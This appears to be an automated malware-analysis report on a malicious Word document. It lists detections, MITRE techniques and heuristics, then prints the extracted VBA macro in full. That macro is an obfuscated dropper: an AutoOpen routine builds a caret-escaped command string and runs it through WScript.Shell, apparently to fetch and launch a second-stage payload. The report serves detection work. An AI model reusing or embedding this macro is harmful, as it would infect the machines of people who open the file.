MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with critical firings for Shell() and WScript.Shell usage, indicating an attempt to execute arbitrary commands. The AutoOpen macro is present, suggesting automatic execution upon opening. The script appears to construct a command string using concatenation, likely to download and execute a second-stage payload, as suggested by the ClamAV detection name 'Doc.Dropper.Valyria-6668024-0'.
Heuristics 10
-
ClamAV: Doc.Dropper.Valyria-6668024-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6668024-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Error 62513 * zIacKW * 89634 * zpsut bwdnukzCO = CreateObject("WScript.Shell") _ . _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Error 62513 * zIacKW * 89634 * zpsut bwdnukzCO = CreateObject("WScript.Shell") _ . _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "umJJFLVjtf" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9947 bytes |
SHA-256: ecbae76d2e6e6c02351fb90b8e699b43da038709685fee2d7d3dcfb970b5daef |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
144 of 228 identifiers look randomly generated (e.g. 'rizjmazzZPXBF'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EaQtQvZi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "GjWCjJazapR"
Function LDVErTJs()
On Error Resume Next
Error 61956 * JuKbbO
ERirvVifR = "md /v^:" + "^ON^ " + " ^ /c" + Chr(2 + 3 + 2 + 1 + 26) + " " + " ^Se" + "^T ^" + " A^K=A" + "^ACA^gA"
Error 63986 * XMDXTr * JOwzq * fAnwYw
Error 69710 * FJwJcM
Error 98572 / ZWPJwP * JLoVuj * 88844
PohwL = "A^I^A^" + "ACA^g" + "A^A" + "^" + "I^A^" + "AC^A^g" + "AAIA^AC" + "Ag^A^A" + "I^A"
Error VwwJY / wRPYz
Error 59505 / nQfBiM * 60174 * uZJPH
Error 28808 * YTRVC
Error OmKOz / Ojvzl / iwXoCi / UHzwhr
zipYfEisavJ = "^A" + "CA" + "^gAA^I" + "^" + "A^ACAg" + "AQfA0" + "^H"
Error sOSVlj / AfOrL / 6800 / OpdXS
rZfdh = "^A7^B" + "A^a^AMG" + "^" + "A0" + "^BQ^" + "Y^A" + "M^GA9" + "^B^w" + "^" + "O^"
Error OvdLR * SOXPR
Error 65437 / oNckfI
Error 15981 * vsrPJ
Error zEoOl * LFzrVS
Error NMoCZ / aPfnKP
GnSRoCl = "As^GAh" + "^B^" + "QZ" + "^A" + "^I" + "^HA" + "iBwOA"
Error wdjVf / ZBDWAD
Error MhMrGL / UPPtL / 86036 * sSDDVs
Error 6796 / iDYXGz
Error 48523 / dIwRP / 91359 / HItzPI
iaiZbFMr = "c^EAC" + "^B^A^aA" + "^QC^A^g" + "^A^" + "QbA^UG" + "^" + "A^0B^"
Error 42760 / 42038
Error mIYsv / DjVKu
Error 38882 * iDGPYT * fcHXiI * jAJQki
Error kASBP / 76484 * BWjFHP * wLmBHb
Error 51500 / iTSRLj * BwoTi / 6558
WOCzK = "QSA^0CA" + "lBw" + "aA" + "8GA^" + "2B^gb" + "^AkEA" + "^7" + "A^QKA" + "c^E" + "^AC^" + "B^A"
Error GTwssa / ZYXSL * PinoE / ptLFT
Error BlfMil / qMRjk
ijScjYC = "^a^A" + "QC^A" + "^gAA" + "LAU" + "^EA" + "jBw^Q^A" + "^QC^A^o" + "A" + "QZA" + "^" + "wG^A" + "^p^B" + "g"
Error jOMiw / 10817
Error JhRNJ * 79011 * 91113 * dUGZj
Error pjuUC * EEpKZ
fHPOjAh = "R^AQG^A" + "h^Bwb^" + "A" + "wGAu" + "^B^w^d^" + "A8^G^"
Error kZhjlV / QYGBQD
aRqYfOkYPUi = "AE^B^g^" + "L^AE^F" + "^A^zBg" + "QAQ" + "CA7" + "^" + "BQ" + "^e"
Error 16696 * jpBWB * kSjFd / CkizUs
Error 48150 * 86765
Error hZIoT * Mznjlp
wwQzBBZzwcH = "^AI^H^A" + "0^B" + "we^A^kC" + "^A" + "V"
Error jWwNB * BnVVW
Error OVjfoQ / ztPQj
Error 14707 / vQvKCw
iCQofJ = "^BAcA" + "k^GA^k" + "A^A^I" + "A^4^GAp" + "^" + "B^" + "AI^A" + "U^E^A^j" + "B^w^" + "QA^QC^"
LDVErTJs = ERirvVifR + PohwL + zipYfEisavJ + rZfdh + GnSRoCl + iaiZbFMr + WOCzK + ijScjYC + fHPOjAh + aRqYfOkYPUi + wwQzBBZzwcH + iCQofJ
Error fsHflm / zTdjS
Error BEaYq / fhiIM
Error aMQkF * 94870
End Function
Function QqtwSndqsl()
On Error Resume Next
Error 91240 / 17037
Error GwTMu / XwKtF * aSRzzO * TthslC
Error 58912 * qGFvl
jjjUQYa = "A^o^A^" + "AaA^M" + "G^A" + "^hB^Q^" + "Z" + "^AIHA" + "v^BgZA" + "^s^D" + "An^A^Q" + "Z^A^g"
Error MVkkp / ujGoKm
Error 6199 * lPtJG
Error 18592 * jJVSZ / hKBtC * EnKqO
Error lciOi * mLfNi / 85050 * 78523
BYcqNEp = "^H^A^" + "lB^g^" + "LAcC" + "^Ar^A^" + "Q" + "dA" + "sGA" + "H^"
Error rmjqsv / vCZYaC * 90121 / RmsCwS
hGWBi = "BA^JAs" + "C^AnA^A" + "^X^Ac" + "CAr" + "^Aw^Y^" + "A^kG" + "^A^sB^g" + "Y^" + "AU"
Error 54970 * OYaUa * GRvWrQ / SjPnpP
FrjBTr = "HA^w^B" + "g" + "O^" + "A^Y" + "^H^A^u" + "^B^" + "Q^Z^A^Q"
Error 43090 * YbWNcO
Error 82059 * HpiWY * cZRJHX * AqaSj
Error 21890 * 96615
TPlRzccvu = "C" + "^A^9A^" + "wRA^IEA" + "^oB" + "^" + "A^JAs" + "D" + "^AnAwN" + "AA" + "D^A3" + "^AwJ" + "A" + "ACA"
Error afnJi / fbmRlp * hYnnH / rirkmF
Error wJfGd / dSYzV * tBqXo * XUioB
Error 85542 * CtDmiC * jRJGoM * MNppSP
ovDJUidM = "9^AA^IA" + "^U^H^Ar" + "BwRA^Q" + "CA^7A^Q" + "K^A" + "c"
Error SHLIas * AoSni
Error 84172 / vjiUn * Hcvpn * jdwRbb
Error 75745 / pjvADs
dSNWk = "CA^A" + "B" + "wJA" + "^gCA^0" + "BQaA^wG" + "Aw^B^w^" + "U^A4C^" + "AnA" + "^" + "QR^A"
Error duzcQ * MjXFkw / zQVXi / KiQSn
suXVJjjjit = "^8C^" + "A1^" + "Bgc^A^" + "4C" + "^A^yB" + "^A^d^" + "Ak^" + "GA" + "^" + "i^" + "B^" + "gc^A^E^" + "GAzBwc^"
Error 41446 / sXkCpT / hwEwwN / NbKYkQ
Error LwOiLh / kfGBOl
Error qALGW / ESpks
Error 9774 * JLloL
Error 65943 / OLtIDH * 18561 / FTEOaU
IiRvd = "A" + "^UG" + "Au^BQ^a" + "AM^H^A" + "^1^Bg^Y" + "^A^"
QqtwSndqsl = jjjUQYa + BYcqNEp + hGWBi + FrjBTr + TPlRzccvu + ovDJUidM + dSNWk + suXVJjjjit + IiRvd
Error 18382 / WNfEo / ZscMJL * wpcjw
Error 6532 / zBriT * GTjVBK / iMiHw
Error 13347 / Yquzz * 40345 * 86540
End Function
Function zIUGwiLHwk()
On Error Resume Next
Error owcGV * 48830
Error 30208 / uDNVz
ZujQZtakwz = "8CAv^A^" + "g^" + "O^A" + "A" + "HA^0B" + "A^d^A^g" + "G^A^AB" + "^wV^A" + "cD^AN^B" + "Q" + "cA^" + "4E"
Error 99176 / RndHoV / iwwvZY / 8631
Error izPYf / sPJMwq
Error 17400 / 2231
Error VISYs * IAGOcw
Error oiwEzA / ZWbzR / vPFbHm / EzwBD
Error brTrbE * NOihYP
AUnvbHHFcXo = "^A" + "O" + "Bw" + "^L^A0G" + "A" + "v^BwY^" + "A4CAhB^" + "AZA^k"
Error 11225 / dYbql / 88835 * GspaH
Error 35404 / PdmKRz
blzYBKzcNvA = "GA" + "yBwb" + "Aw^G^" + "A^mB^gZ" + "^" + "A8GA^5B" + "^AdA" + "^w" + "GAh"
Error AhYQiq * VJHCDQ
Error 45911 / vkuOs * LLwSlt / bzdEpq
Error 79976 * jGsiRz
OJVmWlK = "BQ^Z" + "^AIH^Ak" + "^B" + "gb^A^E" + "G^As^Bw" + "c" + "AkG" + "^"
Error bHiZih * FtKVM / 37913 * FqkiH
Error biTwKM * IosPwK
Error 70567 * BFEzw
Error 56797 * LsSXw * 90862 / iJQGwP
ikokzXurlv = "As^" + "B" + "^Q" + "Y^AMG^" + "A" + "pBAc" + "^" + "A^8G^" + "AyBAdA8" + "CAvA^g^" + "OA^AH^A"
zIUGwiLHwk = ZujQZtakwz + AUnvbHHFcXo + blzYBKzcNvA + OJVmWlK + ikokzXurlv
Error qnAYOd * 46279 * 39703 / zFSGQ
Error 49622 / fZpoAA
Error lntFw / VcZGWq
End Function
Function zzaRRzYGrvE()
On Error Resume Next
Error UzKBpM / tHjUkt
Error 575 * mUVdpi
CBDCnna = "0^B^A" + "^dA" + "gG" + "^A" + "A^B^A^d" + "AA^" + "F" + "AyA" + "^g^YA" + "^k^G" + "A^y^A^w" + "L^A^4^"
Error nHtCM * PzfIvC
Error 85254 * iuzEWv * VzzBBE / 17355
Error 76156 * iTvrpo
Error kqjJm / XisVrq
Error 81929 * JumYcI / 53718 * ZQkWj
WPfqAJl = "G^A" + "^pB^g" + "LA^" + "E^G" + "A" + "p^"
Error 86673 / Bwioq
Error KQbfH * 51481
Error 31734 / wsFzw
KvVEnmj = "B^g" + "cA8" + "^G^A^tB" + "^Q^Z^A0" + "^GAhB" + "AbA8CA" + "vA^gO" + "AAHA0" + "BA^dA^g" + "^G" + "^"
Error 49015 * NLBwt
Error lBYAD * rJFkbO
Error hpqbFT / QChPpA / 79846 * aUzqVV
MztiUtni = "A^A^" + "B^" + "wb" + "Aw^E^A^" + "u^BQN" + "^A^8" + "CArBAb^" + "A^4"
Error XqKktm * tcFkYt
Error wNOszO * RbUwr
Error 26836 * 71140 / WfQdY / SIQaOu
ofAvitQq = "CA^5^B" + "Q^" + "b^AU" + "^GA^kBQ" + "Y^A^M" + "GA^h^B"
Error 33391 / hwOUTL
Error izawZN * 91785 * FIvFcW * 885
Error qzIjAU / bdCKtz
VbHHfwPAG = "^wY^A" + "YH^A" + "u^" + "AAb^A^k" + "^G" + "^AhB^Q" + "bA" + "^8C^Av^" + "AgO^" + "A^AH^" + "A0BA^"
Error fkqVQ * 12135
DWVAVHV = "d^A^gGA" + "^A^B^A" + "NA^8C" + "A^u" + "^BwY" + "A4"
Error DDSBdi * XwLlzF / 28485 * XuZmzf
Error 77324 / PVkHF
pVPUIF = "C^A1" + "B^g^Z^" + "A^4" + "^" + "G^"
Error 46923 / YQIOHC / 8515 / OpDwvO
Error rQlHi / wJuJo
Error bZqOP * SjtvPw * 18869 / ZVMwV
Error UuYPF / IuUSjO
HFcdRWNN = "Ah^B^Q" + "^aA^QHA" + "^jBg^Y" + "A" + "^4C" + "An^Bwb^" + "AwG" + "^AiB^w^" + "LA^8C^A" + "^6A" + "AcA" + "^"
zzaRRzYGrvE = CBDCnna + WPfqAJl + KvVEnmj + MztiUtni + ofAvitQq + VbHHfwPAG + DWVAVHV + pVPUIF + HFcdRWNN
Error jdstzw * HZQPLK / CnNfZ * swtQB
End Function
Function TIESXJwZMs()
On Error Resume Next
Error qfrnbD / EcTchK
Error UzNfGh * ZFCRw
Error 69208 / VrTHZH * 13801 / JzRolj
ENmmrLp = "Q" + "H^A" + "0^B" + "Aa^AcC" + "A9A^Q" + "VAA^" + "H^A^p^B" + "AJA^" + "sDA0^B" + "gbA^" + "UG"
Error pdJaS / wPSHO
Error 3193 / bwEPjw * DBnIUL * GRSUlL
Error 12305 * ZluYXj
Error IHYZhz / qMAEfo
Error 21600 * 5090 / 20971 / 83317
dJQbsEdHtj = "A^p^B" + "^AbA^" + "M^" + "E" + "^A" + "i"
Error HrVkHQ / VmEks * CqnMo * wWIJcC
Error GRMqi * 52505 * 97615 * iXWoTC
WzFYj = "B" + "Q" + "Z^" + "Ac^F^" + "AuA" + "Ad^A^U" + "^G^" + "A" + "^O" + "^BA" + "I^"
Error 68198 / iEAYwh / 87600 * DnFjiR
Error 46395 / ZWVimI / 69790 * FjlvrB
Error 94675 * DmPTYd * RdCqO * DZqGMc
troXQfk = "A^Q^H" + "AjB^" + "QZAoGA" + "^i^" + "B^w^b" + "A0C^A" + "3B^Q^" + "Z" + "^" + "A4GA" + "9A^QUA" + "MHA"
Error ssvPt / wHmLmp
Error JJEzu / znnFbV / cQNczE * jPPEGl
Error 54223 * LTzfm * vzCIK / HViOD
Error 31026 * nQTiN * 95401 * iQJbP
KBNoOtVjHPm = "C^B^" + "AJ^ ^" + "e- l" + "le" + "^h^sr" + "^e" + "wop" + "&"
Error oXIVqY / 67615 * 77408 / kXuuAr
hKPolnFPG = "& ^" + "F" + "^oR /^L" + " %^9 " + "^iN" + " " + "(^ ^" + " ^ ^9" + "65^ " + "^" + ", ^ " + "^ -1"
Error 70556 * chwqD / 32735 / ZAficE
Error 64919 * AoInWi * jLocb / KZPjdS
cDcYslr = " ," + "^ ^ " + "^0) ^d" + "O " + " ^S^E" + "t G^F" + "r" + "^"
Error lrlpXz / ItkVk
phjMCDl = "1=!G" + "^" + "Fr" + "^1!!" + "A^" + "K:~ %" + "^9, 1" + "!" + "& ^i^F " + " %^9"
Error 76382 / jdZpzT * uRWCZj / pFvFP
Error 71382 * LLPriw
Error IswMao * boEmnz * 87379 / FWjwr
HFpFP = " LsS" + " ^1 cA" + "^l^L %" + "G^" + "Fr^" + "1:^~" + "-^966" + "% " + Chr(2 + 3 + 2 + 1 + 26) + " " + ""
TIESXJwZMs = ENmmrLp + dJQbsEdHtj + WzFYj + troXQfk + KBNoOtVjHPm + hKPolnFPG + cDcYslr + phjMCDl + HFpFP
Error SwhdD / LqJvRO
Error oztIj * EltGEw
Error CUzPiB / iIsKUR
End Function
Attribute VB_Name = "umJJFLVjtf"
Sub AutoOpen()
On Error Resume Next
Error lYVKNO / Xnbns
Error WSEwz * QVzcKw / 60661 * wkirVV
Error 62513 * zIacKW * 89634 * zpsut
bwdnukzCO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(3 + 5 + 9 + 11 + 39) + FRqPWUVUfbaE + rizjmazzZPXBF + LDVErTJs + QqtwSndqsl + zIUGwiLHwk + zzaRRzYGrvE + TIESXJwZMs + Yanrjzf + uBiIiVEfczn, 342822333 - 342822333)
Error omElG / brUPHR
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.